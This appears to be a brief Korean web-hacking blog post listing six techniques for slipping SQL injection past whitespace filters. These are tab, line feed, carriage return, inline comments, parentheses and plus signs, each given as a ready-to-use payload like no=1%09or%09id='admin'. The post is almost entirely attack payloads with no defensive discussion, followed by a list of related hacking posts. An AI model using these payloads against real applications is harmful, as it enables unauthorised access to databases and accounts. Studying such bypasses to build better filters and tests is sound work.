SQL Injection 공격시 공백 문자 필터링시 우회 방법
1. Tab : %09
- no=1%09or%09id='admin'
2. Line Feed (\n): %0a
- no=1%0aor%0aid='admin'
3. Carrage Return(\r) : %0d
- no=1%0dor%0did='admin'
4. 주석 : /**/
- no=1/**/or/**/id='admin'
5. 괄호 : ()
- no=(1)or(id='admin')
6. 더하기 : +
- no=1+or+id='admin'
'Webhacking' 카테고리의 다른 글
| XML Attack Surface (0) | 2013.08.28 |
|---|---|
| Python Blind Injection Sample (0) | 2013.03.04 |
| [PHP2EXE] PHP Compiler/Embedder 1.21 (0) | 2013.03.04 |
| .htaccess Attack Sample for PHP (0) | 2013.03.04 |
| webhacking.kr 9번 문제 풀이 (1) | 2013.03.04 |